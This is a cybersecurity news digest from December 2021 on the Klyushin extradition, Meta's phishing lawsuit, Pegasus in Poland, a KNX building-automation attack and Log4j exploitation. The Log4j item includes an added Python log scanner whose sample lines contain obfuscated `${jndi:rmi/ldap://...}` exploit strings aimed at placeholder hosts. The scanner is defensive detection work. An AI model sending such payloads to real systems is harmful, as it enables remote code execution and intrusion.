Metacurity

Justice Department Extradites Kremlin-Linked Hacker Accused of Stealing Earnings Information

Meta sues 39,000 phishing sites' operator, US and UK send cyberwarfare experts to Ukraine, NSO spyware used against top Polish opposition figures, German automation company crippled by attack, more

Cynthia Brumfield
Dec 21, 2021

The U.S. Justice Department announced it had extradited from Switzerland a Kremlin-linked Russian national, Vladislav Klyushin, on charges that he participated in a scheme to hack and steal corporate earnings information about Tesla Inc., Roku Inc., and others, earning tens of millions of dollars in illegal profits.

Klyushin, also known as “Vladislav Kliushin,” was arrested in Sion, Switzerland on March 21, 2021, and was extradited to the United States on December 18.  Klyushin was charged alongside four other Russian nationals, Ivan Ermakov, Nikolai Rumiantcev, Mikhail Vladimirovich Irzak, and Igor Sergeevich Sladkov, who remain at large. Ermakov, a former member of Russia’s military intelligence agency, was previously and separately charged with hacking crimes in 2018 in former special counsel Robert Mueller’s investigation into Russian interference in the 2016 U.S. presidential election. (Aruna Viswanatha and Dustin Volz / Wall Street Journal)

Related: The Record, Bloomberg, Justice.gov, SEC.gov, CNN, Bloomberg Law, Dark Reading, VOA News, Gizmodo, The Register - Security, Reuters, STL.News, IT News, BusinessWorld, NDTV Gadgets360.com, CyberNews

FBI @FBI
Russian national Vladislav Klyushin was extradited to the U.S. from Switzerland and is charged, along with four other Russians, for his alleged role in a global conspiracy to obtain unauthorized access to U.S. networks to commit wire and securities fraud.
go.usa.gov/xetes
Assistant Special Agent in Charge Albert Murray III said, "Today’s announcement and the extradition of Vladislav Klyushin is just one more example of how the FBI and our partners are working around the clock and around the world to counter the cyber threat that we face today. As alleged, Klyushin and his co-defendants used various illegal and malicious means to gain access to computer networks to perpetrate their illegal trading scheme. These crimes have real consequences, and as our efforts in this case demonstrate, the FBI is relentless in our work to identify and locate criminals like Klyushin—no matter where they are—and bring them to the U.S. to face justice."

December 20th 2021

Meta, the parent company for Facebook, Instagram, and WhatsApp, filed a lawsuit today in a California court against the operators of more than 39,000 phishing sites hosted through the Ngrok service.

Meta seeks to obtain a court injunction and damages of at least $500,000 from the operators of these sites, even before they are identified. The suit alleges the group created phishing sites on their local systems and then used Ngrok, a localhost-to-internet relay service that allows developers to expose their local sites on the ngrok.io domain. According to the suit, the group then spread links to these ngrok.io domains to victims and collected their account credentials. (Catalin Cimpanu / The Record)

Related: Fossbytes, CNET, The Hacker News, Infosecurity Magazine, The Sun, Infosecurity Magazine

According to roughly a dozen officials, the United States and Britain have quietly dispatched cyberwarfare experts to Ukraine to prepare the country to confront cyberattacks against the electric grid, the banking system, and other critical components of Ukraine’s economy and government as Russian president Vladimir Putin plans another incursion into the country.

Officials briefed on the intelligence say that if Putin does launch a cyberattack, either as a stand-alone action or as a precursor to a physical-world attack, it will most likely come after Orthodox Christmas, at the end of the first week of January. (David E. Sanger and Julian E. Barnes / New York Times)

Horkos @ the Centre for Unilateral Analysis @WylieNewmark
It is nice to see mainstream news covering the longstanding analysis that actual cyber attacks (i.e., CNA) could be reasonably expected to be used primarily to weaken confidence in Ukraine’s government.

Quoting Julian E. Barnes @julianbarnes:

NEW: Could Putin launch a cyberattack on Ukraine ahead/instead of a real-world strike? US and UK are trying to support Ukraine's cyber defenses--though plugging the holes in Kyiv's systems is an impossible task. New with @SangerNYT https://t.co/CRjQdDh7FL

December 21st 2021

Researchers at the University of Toronto-based Citizen Lab confirmed that the cell phones of two top Polish opposition figures, Polish lawyer Roman Giertych and prosecutor Ewa Wrzosek, were infected with Pegasus spyware from the U.S.-sanctioned Israeli firm NSO Group.

A Polish state security spokesperson would neither confirm nor deny whether the government ordered the hacks or is an NSO customer. Citizen Lab previously detected multiple infections in Poland dating from November 2017, although it didn’t identify individual victims then. (Frank Bajak and Vanessa Gera / Associated Press)

Related: Hamodia

John Scott-Railton @jsrailton
BREAKING: top Polish opposition figures hacked with NSO's spyware. We @citizenlab investigated & confirmed that the iPhones of @e_wrzosek & @GiertychRoman were infected with #Pegasus. Thread 1/ By @fbajak & @VanessaGera
apnews.com/article/techno…

December 20th 2021
Nathaniel Gleicher @ngleicher
Another in the long, long history of evidence of the indiscriminate targeting of journalists and opposition figures by the surveillance-for-hire industry. Thank you @jsrailton and @citizenlab for continuing to drive this!

Quoting Eva @evacide:

Just in case you think NSO Group's Pegasus is only being used to target opposition figures in MENA or LatAm, here's Poland: https://t.co/pVafsSCLJb

December 20th 2021

Researchers at Limes Security say that a German automation company suddenly lost contact with hundreds of building automation system (BAS) devices (light switches, motion detectors, shutter controllers, and others) after a rare cyber attack locked the company out of the BAS it had constructed for an office building client.

The researchers discovered that three-quarters of the BAS devices in the office building network had been mysteriously purged of their operating system and applications and locked down with the system's own digital security key, which was under the attackers' control. The firm had to revert to manually flipping on and off the central circuit breakers to power on the lights in the building until Limes devised a way to recover the key. The motive behind the attack could have been a failed ransomware incident or simply cyber vandalism. (Kelly Jackson Higgins / Dark Reading)

Related: Limes Security

blake @voteblake
What a story. Building owners locked out by ‘smart’ lock system, appears to have been deliberate action
KNXlock – an attack campaign against KNX-based building automation systems – Limes Security (limessecurity.com)

December 20th 2021

French video game maker Ubisoft said that a misconfiguration in its IT infrastructure exposed gamer data for its Just Dance video game series players.

A Ubisoft spokesperson said the exposed data was limited to ‘technical identifiers,’ which include GamerTags, profile IDs, Device IDs, and Just Dance videos that were recorded and uploaded to be shared publicly with the in-game community and on users’ social media profiles. (Catalin Cimpanu / The Record)

Related: Stevivor, Ubisoft

Researchers at Cryptolaemus warned that the Log4j vulnerability is now being exploited to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.

The threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Then, using Meterpreter, the threat actors can connect to the compromised Linux server and remotely execute commands to spread further on the network, steal data, or deploy ransomware. All organizations should scan for vulnerable applications that use Log4j and update them to the latest versions. (Lawrence Abrams / Bleeping Computer)
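
The exploitation chain above starts with a JNDI lookup string reaching a vulnerable logger, so the first place defenders look for it is in web server and application logs. The following is an added example, not code from the article or from Cryptolaemus, that scans log lines for `${jndi:...}` lookups pointing at RMI, LDAP and the other JNDI schemes, and first normalises the nested-lookup obfuscation (`${lower:j}`, `${upper:j}`, `${::-j}`, `${env:X:-j}`) that attackers used to evade naive string matching. It handles only those lookup forms (an assumption; Log4j supports more), and the log lines and IP addresses are constructed samples drawn from documentation ranges.

```python
import re

# Innermost lookup: a ${...} whose body contains no further '${' or '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# After normalisation, a JNDI lookup using one of the schemes the Log4j JNDI
# lookup will dereference. Only the scheme is needed for the alert.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def _reduce_lookup(m):
    """Collapse one innermost lookup to the text Log4j would substitute for it.

    Assumption: we model only lower/upper and the default-value form
    (${x:-default}, ${::-c}); unknown lookups and the JNDI lookup itself are
    left untouched so the detector can see them.
    """
    body = m.group(1)
    head, _, rest = body.partition(":")
    head = head.strip().lower()
    if head == "jndi":
        return m.group(0)
    if head == "lower":
        return rest.lower()
    if head == "upper":
        return rest.upper()
    if ":-" in body:
        # ${env:NOPE:-j} or ${::-j}: an unset variable yields the default,
        # which is what the attacker relies on.
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize_lookups(s, max_rounds=20):
    """Repeatedly reduce nested lookups from the inside out, bounded to avoid
    spinning on pathological input."""
    for _ in range(max_rounds):
        reduced = _INNERMOST.sub(_reduce_lookup, s)
        if reduced == s:
            return s
        s = reduced
    return s


def scan_log_lines(lines):
    """Return (line_number, scheme, normalised fragment) for each line that
    carries a JNDI lookup after obfuscation is removed."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        m = _JNDI.search(normalized)
        if m:
            findings.append((lineno, m.group(1).lower(), normalized[m.start():m.start() + 60]))
    return findings


# Constructed sample access-log lines (203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges). Line 2 is a plain lookup, lines 3 and 4 use the
# lower/default-value obfuscations, lines 1 and 5 are benign.
SAMPLE_LOG = [
    '198.51.100.23 - - [20/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [20/Dec/2021:09:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://203.0.113.9:1099/Object}"',
    '198.51.100.23 - - [20/Dec/2021:09:14:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:L}${lower:d}ap://203.0.113.9:389/a}"',
    '198.51.100.23 - - [20/Dec/2021:09:14:12 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9:1099/a}"',
    '198.51.100.23 - - [20/Dec/2021:09:14:15 +0000] "GET /health HTTP/1.1" 200 12 "-" "${sys:java.version} check"',
]

if __name__ == "__main__":
    for lineno, scheme, fragment in scan_log_lines(SAMPLE_LOG):
        print(f"line {lineno}: jndi scheme={scheme} payload={fragment!r}")
```

Run against real logs, the scanner should be pointed at every field an application might log (User-Agent, Referer, request path, form values, headers such as X-Forwarded-For), since the lookup fires wherever the string reaches a vulnerable logger. A hit in the logs confirms an attempt, not a compromise; the remediation the article calls for (finding and updating every application that bundles Log4j) is what removes the exposure.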

Related: Venture Beat, Heimdal Security Blog


The Department of Justice announced that it had filed a civil complaint in San Diego federal court to return more than $154 million allegedly stolen from Sony Life Insurance Company Ltd, a subsidiary of Sony, by one of its employees, Rei Ishii.

The complaint alleges that Ishii embezzled funds from the company in May and diverted them to an account he controlled at a La Jolla bank. The U.S. Attorney's Office said Ishii moved the funds by falsifying transaction instructions when the Tokyo-based company attempted to transfer funds between its accounts. Law enforcement could trace Bitcoin transfers by obtaining the private key to Ishii’s bitcoin address following a joint investigation with Japan’s National Police Agency, the Tokyo Metropolitan Police Department, Tokyo District Public Prosecutors Office, and JPEC (Japan Prosecutors unit on Emerging Crimes). (City News Service)

Related: Justice Department

Bangalore, India-based Wipro announced it would acquire Austin, TX-based cybersecurity consulting company Edgile for $230 million.

The company will develop Wipro CyberTransform, an integrated suite that will help enterprises enhance boardroom governance of cybersecurity risk, in collaboration with Edgile. (Rishabh Bhatnagar / Bloomberg Quint)

Related: Business Wire Technology: Security News, Times of India
